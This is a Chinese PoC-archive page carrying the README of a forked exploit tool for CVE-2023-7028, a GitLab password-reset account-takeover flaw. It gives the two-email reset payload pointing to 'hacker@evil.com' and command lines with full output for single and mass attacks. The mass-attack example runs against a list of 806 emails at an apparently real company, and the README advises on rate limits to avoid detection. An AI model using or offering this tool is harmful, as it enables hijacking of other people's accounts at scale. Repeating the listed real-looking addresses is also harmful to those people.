POC详情: 7d64816a8729c02fd9efa5f46aa010216db1ac60

来源
关联漏洞
标题: GitLab 安全漏洞 (CVE-2023-7028)
描述:GitLab是美国GitLab公司的一个开源的端到端软件开发平台,具有内置的版本控制、问题跟踪、代码审查、CI/CD(持续集成和持续交付)等功能。 GitLab 存在安全漏洞,该漏洞源于用户帐户密码重置电子邮件可能会发送到未经验证的电子邮件地址。
描述
This FORK of repository presents a proof-of-concept of CVE-2023-7028. I am only improve exploit usage
介绍
# CVE-2023-7028 | Account-Take-Over Gitlab

## Disclamer

This code is a proof of concept of the vulnerability, I'm not pushing anyone to use it on gitlab instances they don't own.
This tool has been developed for research and educational purposes only and I will not be held responsible for any use you may make of it.

## Description

**THIS IS FORK OF REPO <https://github.com/Vozec/CVE-2023-7028>. I am only improve exploit usage.**

CVE-2023-7028 refers to an Account-Take-Over vulnerability that allows users to take control of the gitlab administrator account without user interaction.

The vulnerability lies in the management of emails when resetting passwords. An attacker can provide 2 emails and the reset code will be sent to both.
It is therefore possible to provide the e-mail address of the target account as well as that of the attacker, and to reset the administrator password.
_(Gitlab points out that 2-factor authentication prevents this vulnerability from being exploited, since an attacker, even after resetting the password, will not be able to log in.)_

This vulnerability was discovered by [asterion04](https://hackerone.com/asterion04)

## Payload

Here's an example payload

```http
user[email][]=my.target@example.com&user[email][]=hacker@evil.com
```

## POC

### Method 1: Using temp email (single target)

```bash
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: 6grp7ert9y@laafd.com
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to my.target@example.com and hacker@evil.com !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for 6grp7ert9y@laafd.com
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: my.target@example.com
        Password: l3mG2v2XN4UBzbN18ZkW
```

### Method 2: Using evil email (single target)

```bash
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com -e hacker@evil.com

[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = 1Yt1EUeWSL-oiSV7v1Z6ghdCDG3w0FFCQB8Uc5B5GAodVNJ26OlPT8HtYYleGXB9F0otas3gnHOtRfhFall8pQ
[DEBUG] Sending reset password request
[DEBUG] Emails sended to my.target@example.com and hacker@evil.com !
        Input link received by mail: https://gitlab.example.com/users/password/edit?reset_password_token=U8PSU7DXdebdTD3GjMiX
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = N7gs43C9ZMxdniA9UEzzfH2Rlhgejt75M1Kw88vaarP_Z4uE38JjPDT6ZM-xA_mDfZm3HyO-E8jeCFzFMfoOHA
[DEBUG] Changing password to EU7XIYjlawjb5tH2jgmU
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: my.target@example.com
        Password: EU7XIYjlawjb5tH2jgmU
```

### Method 3: Using email list from file

```bash
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting full attacks on 806 target(s) with rate limit 10 rps
[DEBUG] Processing target 1/806: vkuzmina@korusconsulting.ru
[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: abc123xyz@laafd.com
[DEBUG] Reset request sent successfully for vkuzmina@korusconsulting.ru
...
[DEBUG] Attack completed: 800/806 requests sent, 750/806 passwords reset
```

### Method 4: Skip mode - only send reset requests (faster)

```bash
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt --skip -rps 20

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting reset requests on 806 target(s) with rate limit 20 rps
[DEBUG] Processing target 1/806: vkuzmina@korusconsulting.ru
[DEBUG] Reset request sent successfully for vkuzmina@korusconsulting.ru
[DEBUG] Processing target 2/806: mromanenko@korusconsulting.ru
[DEBUG] Reset request sent successfully for mromanenko@korusconsulting.ru
...
[DEBUG] Reset requests completed: 800/806 successful
```

## Help

```md
$ python3 ./CVE-2023-7028.py -h
usage: CVE-2023-7028.py [-h] -u URL (-t TARGET | -l EMAIL_LIST) [-e EVIL] [-p PASSWORD] [--skip] [-rps RATE_LIMIT]

This tool automates CVE-2023-7028 on gitlab

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Gitlab url
-t TARGET, --target TARGET
Target email
-l EMAIL_LIST, --list EMAIL_LIST
File with target emails list
-e EVIL, --evil EVIL Evil email
-p PASSWORD, --password PASSWORD
Password
--skip Skip password reset, only send reset requests
-rps RATE_LIMIT, --rate RATE_LIMIT
Requests per second (default: 10)
```

### Usage Notes

- **Single target**: Use `-t` parameter to attack single email address
- **Multiple targets**: Use `-l` parameter to load email addresses from file (one per line)
- **Evil email**: Without `--evil` option, script uses public temp-mail to find reset link (be careful during pentests)
- **Skip mode**: Use `--skip` to only send reset requests without waiting for password reset (faster for mass attacks)
- **Rate limiting**: Use `-rps` to control requests per second (default: 10). Higher values = faster but more detectable
- **Email list format**: Plain text file with one email per line

### Examples

```bash
# Single target with custom password
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t admin@example.com -p MyCustomPass123

# Mass attack with slower rate limit
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt -rps 5

# Fast reconnaissance - only send reset requests
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt --skip -rps 50
```

## Versions concerned

- 16.1 to 16.1.5
- 16.2 to 16.2.8
- 16.3 to 16.3.6
- 16.4 to 16.4.4
- 16.5 to 16.5.5
- 16.6 to 16.6.3
- 16.7 to 16.7.1

## References

- <https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/>
- <https://docs.gitlab.com/ee/install/docker.html>
- <https://www.cert.ssi.gouv.fr/avis/CERTFR-2024-AVI-0030/>
文件快照

[4.0K] /data/pocs/7d64816a8729c02fd9efa5f46aa010216db1ac60 ├── [ 11K] CVE-2023-7028.py └── [6.6K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。